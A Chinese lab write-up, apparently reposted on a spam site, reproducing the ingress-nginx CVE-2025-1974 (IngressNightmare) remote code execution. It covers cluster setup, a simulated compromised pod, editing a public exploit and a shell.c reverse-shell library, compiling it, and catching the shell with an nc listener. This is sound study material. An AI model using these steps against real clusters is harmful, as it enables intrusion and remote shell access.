当前位置: 首页 > wzjs >正文

网站关键字分析曲周企业做网站推广

网站关键字分析,曲周企业做网站推广,凡科免费个人做网站有弊吗,怎样把自己的网站推广出去漏洞原理 CVE-2025-1974: The IngressNightmare in Kubernetes | Wiz Blog 分两方面: a、配置注入过程 构造一个恶意的Ingress资源,其中注入ssl_engine指令指向恶意共享库向准入控制器验证端点(AdmissionWebhook)发送Admissio…

漏洞原理

CVE-2025-1974: The IngressNightmare in Kubernetes | Wiz Blog

分两方面:

a、配置注入过程

  1. 构造一个恶意的Ingress资源,其中注入ssl_engine指令指向恶意共享库
  2. 向准入控制器验证端点(AdmissionWebhook)发送AdmissionReview请求(刚才的恶意Ingress资源)
  3. AdmissionWebhook验证通过
  4. Ingress-NGINX Controller监听到Ingress资源变更,在内存中生成配置文件
  5. Ingress-NGINX Controller调用 nginx -t 命令检查配置语法是否合法,触发RCE,反弹shell

b、投递恶意共享库过程

  1. 编译恶意共享库
  2. 构造特殊HTTP请求(旨在触发Nginx特性)投递恶意共享库
  3. Nginx实例处理HTTP请求,由于Nginx特性生成临时文件(保持文件描述符FD打开)
  4. 多次发送AdmissionReview请求爆破文件描述符FD(即并发上述a过程)

环境搭建

安装K8S

版本选择:先看Ingress漏洞版本,倒推K8S版本,参考ingress-nginx官方适配表

https://github.com/kubernetes/ingress-nginx

SupportedIngress-NGINX versionk8s supported versionAlpine VersionNginx VersionHelm Chart Version
🔄v1.12.11.32, 1.31, 1.30, 1.29, 1.283.21.31.25.54.12.1
🔄v1.12.01.32, 1.31, 1.30, 1.29, 1.283.21.01.25.54.12.0
🔄v1.12.0-beta.01.32, 1.31, 1.30, 1.29, 1.283.20.31.25.54.12.0-beta.0
🔄v1.11.51.30, 1.29, 1.28, 1.27, 1.263.21.31.25.54.11.5
🔄v1.11.41.30, 1.29, 1.28, 1.27, 1.263.21.01.25.54.11.4
🔄v1.11.31.30, 1.29, 1.28, 1.27, 1.263.20.31.25.54.11.3
🔄v1.11.21.30, 1.29, 1.28, 1.27, 1.263.20.01.25.54.11.2
🔄v1.11.11.30, 1.29, 1.28, 1.27, 1.263.20.01.25.54.11.1
🔄v1.11.01.30, 1.29, 1.28, 1.27, 1.263.20.01.25.54.11.0
v1.10.61.30, 1.29, 1.28, 1.27, 1.263.21.01.25.54.10.6
v1.10.51.30, 1.29, 1.28, 1.27, 1.263.20.31.25.54.10.5
v1.10.41.30, 1.29, 1.28, 1.27, 1.263.20.01.25.54.10.4
v1.10.31.30, 1.29, 1.28, 1.27, 1.263.20.01.25.54.10.3
v1.10.21.30, 1.29, 1.28, 1.27, 1.263.20.01.25.54.10.2
v1.10.11.30, 1.29, 1.28, 1.27, 1.263.19.11.25.34.10.1
v1.10.01.29, 1.28, 1.27, 1.263.19.11.25.34.10.0
v1.9.61.29, 1.28, 1.27, 1.26, 1.253.19.01.21.64.9.1
v1.9.51.28, 1.27, 1.26, 1.253.18.41.21.64.9.0
v1.9.41.28, 1.27, 1.26, 1.253.18.41.21.64.8.3
v1.9.31.28, 1.27, 1.26, 1.253.18.41.21.64.8.*
v1.9.11.28, 1.27, 1.26, 1.253.18.41.21.64.8.*
v1.9.01.28, 1.27, 1.26, 1.253.18.21.21.64.8.*
v1.8.41.27, 1.26, 1.25, 1.243.18.21.21.64.7.*
v1.7.11.27, 1.26, 1.25, 1.243.17.21.21.64.6.*
v1.6.41.26, 1.25, 1.24, 1.233.17.01.21.64.5.*
v1.5.11.25, 1.24, 1.233.16.21.21.64.4.*
v1.4.01.25, 1.24, 1.23, 1.223.16.21.19.10†4.3.0
v1.3.11.24, 1.23, 1.22, 1.21, 1.203.16.21.19.10†4.2.5

搭建K8S可参照我上篇文章:

【云安全】云原生-centos7搭建/安装/部署k8s1.23.6单节点-CSDN博客

我之前搭过一版K8S,是1.23.6,因此对应安装1.6.4的ingress,处于漏洞版本内

安装Ingress

推荐大佬 Dubito 微信公众号“云原生安全指北”的文章,写得很详细!

【漏洞复现】IngressNightmare CVE-2025-1974 RCE漏洞复现(万字长文|图文并茂|有手就能跟)

1、下载对应版本Ingress的deployment

export http_proxy="http://192.168.48.1:7890"
export https_proxy="http://192.168.48.1:7890"wget https://raw.githubusercontent.com/kubernetes/ingress-nginx/controller-v1.6.4/deploy/static/provider/baremetal/deploy.yaml

2、更换镜像源

首先,查询所需镜像 

cat deploy.yaml | grep image:

其次,使用 渡渡鸟镜像同步站 搜索关键词:ingress-nginx/controller:v1.6.4,更改成该网站的镜像地址即可,对应改成如下三条

swr.cn-north-4.myhuaweicloud.com/ddn-k8s/registry.k8s.io/ingress-nginx/controller:v1.6.4
swr.cn-north-4.myhuaweicloud.com/ddn-k8s/registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20220916-gd32f8c343
swr.cn-north-4.myhuaweicloud.com/ddn-k8s/registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20220916-gd32f8c343

3、部署Ingress

#部署前先取消代理
unset http_proxy
unset https_proxy
#部署
kubectl apply -f deploy.yaml
#验证
kubectl get all -n ingress-nginx

验证发现这时POD处于pending状态,使用如下命令查看原因

kubectl describe pod ingress-nginx-controller-85f587f9d4-bt58m -n ingress-nginx

主要看Events

这是因为单节点部署,而master默认存在污点设置,导致POD无法调度,可通过命令查看并移除污点

kubectl get node
kubectl describe node master-1 | grep Taint
kubectl taint nodes master-1 node-role.kubernetes.io/master:NoSchedule-
kubectl describe node master-1 | grep Taint

再次查看ingress状态,成功安装!

模拟失陷POD

1、本地Docker打镜像

cat <<EOF >Dockerfile
# 使用官方Python基础镜像
FROM python:3.11.7# 设置工作目录
WORKDIR /app# 安装httpx库
RUN pip install --no-cache-dir httpx# 设置容器启动时运行的命令
CMD ["python", "-c", "import httpx; import time; print('Httpx library is available'); time.sleep(9999999)"]
EOF#构建命令
docker build -t python-test-ingress-nginx .

2、把 Docker 镜像导入到 K8s 用的 containerd

docker save python-test-ingress-nginx | sudo ctr -n=k8s.io images import -#确认镜像是否导入成功
sudo ctr -n k8s.io image ls | grep python

 3、K8s部署镜像,模拟失陷POD

首先,编写deployment文件python_deploy.yaml

cat <<EOF >python_deploy.yaml
apiVersion: apps/v1
kind: Deployment
metadata:name: python-appnamespace: test
spec:replicas: 1selector:matchLabels:app: python-apptemplate:metadata:labels:app: python-appspec:containers:- name: python-containerimage: docker.io/library/python-test-ingress-nginx:latestimagePullPolicy: Never
EOF

其次,执行命令部署

kubectl create ns test
kubectl apply -f python_deploy.yaml
#验证状态
kubectl get pod -n test

漏洞复现

1、准备武器(prepare tools)

(1)下载EXP

GitHub - yoshino-s/CVE-2025-1974

export http_proxy="http://192.168.48.1:7890"
export https_proxy="http://192.168.48.1:7890"git clone https://github.com/yoshino-s/CVE-2025-1974.git
cd CVE-2025-1974/

(2)修改EXP

vim exploit.py

由于我这里的环境是模拟失陷POD(贴近实际),属于集群内部网络访问,无需端口转发,用第6、7行的URL即可,注释12、13行;

修改第25、26行PID值和FD值,根据经验判断或者进入ingress容器查看进程可知PID值大约为26开始,FD值大约为6开始

完善脚本,删除47行的 return 

修改shell.c

vim shell.c

服务器地址改成自己攻击机的监听地址

2、打造武器

编译前,先了解ingress-nginx controller执行.so文件依赖的库版本,编译时指定同样的库版本

kubectl get pod -n ingress-nginxkubectl exec -it -n ingress-nginx ingress-nginx-controller-85f587f9d4-gwm8r -- bash
#进入ingress容器之后执行
find / -name "libcrypto.so*" 2>/dev/null

确认ingress-nginx controller容器中库版本是3版本 

同样,看一下编译的机器库版本,发现有3版本可以用

于是使用下面的命令指定库进行编译

gcc -fPIC -Wall -shared -o shell.so shell.c /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/2/fs/usr/lib/x86_64-linux-gnu/libcrypto.so.3#验证
ldd shell.so

3、上传武器

上传以下三个文件到失陷POD

#查看POD名称
kubectl get pod -n test
#上传
kubectl cp ./shell.so -n test python-app-94bdc8d99-prz64:/app/
kubectl cp ./exploit.py -n test python-app-94bdc8d99-prz64:/app/
kubectl cp ./req.json -n test python-app-94bdc8d99-prz64:/app/

4、攻击机进行监听

nc -lvnp 7788

5、attack

进入失陷POD执行EXP

kubectl exec -it -n test python-app-94bdc8d99-prz64 -- bash#进入POD后执行
python exploit.py

成功反弹shell


文章转载自:

http://PSrEnc9U.mwrsg.cn
http://i8oLXlEw.mwrsg.cn
http://3AZIQlhe.mwrsg.cn
http://Vv2L7wqn.mwrsg.cn
http://WpyQnXM6.mwrsg.cn
http://07sDUPhH.mwrsg.cn
http://ZauOaSt7.mwrsg.cn
http://D7WLNc6G.mwrsg.cn
http://ytBcMm9h.mwrsg.cn
http://BnSQ7JD7.mwrsg.cn
http://Mn8CNRDa.mwrsg.cn
http://X1z0icJo.mwrsg.cn
http://QxN1wR1u.mwrsg.cn
http://CtWeDnJt.mwrsg.cn
http://nnMKUtlF.mwrsg.cn
http://ECfv4qRm.mwrsg.cn
http://6leiXzmT.mwrsg.cn
http://0PEQ9Jw7.mwrsg.cn
http://nNuig3tO.mwrsg.cn
http://46lqoKEx.mwrsg.cn
http://IOUJsA56.mwrsg.cn
http://UV6Zgcmd.mwrsg.cn
http://Omf67Gc3.mwrsg.cn
http://vJc6zidp.mwrsg.cn
http://3Li3ozGO.mwrsg.cn
http://oFNhe9zp.mwrsg.cn
http://Zl4JsY95.mwrsg.cn
http://tIGLtsF4.mwrsg.cn
http://ZUcq48JQ.mwrsg.cn
http://agV7kbUq.mwrsg.cn
http://www.dtcms.com/wzjs/636235.html

相关文章:

  • pc端兼手机端网站模板路桥建设网站
  • 网上如何建网站卖量具西宁网站建设哪家好
  • dz论坛做分类网站自助建站帮助网
  • 中山网站软件品牌营销咨询
  • 泰安集团网站建设网页设计个人总结800字
  • 做书app下载网站有哪些内容商城网站设计需要哪些技术
  • 游戏网站logo制作小程序开发平台好牌子推荐
  • 网站后台的搭建嘉兴首页
  • 怎么在网站上做下载做网站租用那个服务器好
  • 简述网站设计的原则泉州手机网站开发
  • 德阳网站开发熊掌号深圳网络运营推广公司
  • 网站开发人员职能职业技能培训学校
  • 建设银行网站上不去了房地产网站建设策划方案
  • 凡科建站代理登录微信静首页制作代码
  • 龙腾盛世网站建设肥东网站建设
  • 顺德品牌网站建设信息如何做好一个外贸进网站的编辑
  • 信用中国 网站 支持建设住房与城市建设部网站
  • 北京自助企业建站模板汽修网站建设免费
  • 网站检测报告哪里做wordpress还有价值么
  • 400网站推广备案 网站名
  • wap网站建设公司公司网站建设素材
  • 哪个网站可以找题目给小孩做市场营销策划咨询
  • 正规网站建设费用鄂州网上房地产
  • 网站开发综合课程设计网站上线后
  • 青岛网站空间公司建站网站
  • 网站建设租用服务器网站怎么做引流
  • 2023来个网站可以看的视频拍摄报价单
  • 台州做微网站自己创建一个网站
  • 网站设计开发制作建立网站程序
  • 代刷网站建设ps网页设计流程